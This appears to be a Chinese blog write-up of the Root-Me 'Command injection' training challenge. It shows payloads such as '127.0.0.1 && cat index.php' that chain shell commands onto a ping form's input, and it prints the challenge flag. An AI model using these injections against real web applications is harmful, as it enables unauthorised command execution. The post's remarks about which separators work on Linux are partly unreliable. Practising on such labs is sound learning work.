RootMe--Command injection

 

题目链接:https://www.root-me.org/en/Challenges/Web-Server/Command-injection

 

题目给了提示:

1. 命令注入  2. flag在index.php

打开题目后一个输入框,先输入127.0.0.1,发现是显示ping某个IP的网络状况。

尝试用连接符&& 查询下有哪些文件目录

127.0.0.1 && ls -al

发现了 index.php 

构造payload查看index.php的内容

127.0.0.1 & cat index.php
127.0.0.1 && cat index.php
127.0.0.1 | cat index.php
127.0.0.1 , cat index.php
127.0.0.1 ; cat index.php

这5个在windows下都可以运行,不过Linux下连接符必须得用 &&,单个&不行 

提交后出现了两个输入框

查看源码发现flag在里面

flag:S3rv1ceP1n9Sup3rS3cure

 

posted @ 2019-04-02 19:14  你认识小哀吗  阅读(399)  评论(0编辑  收藏  举报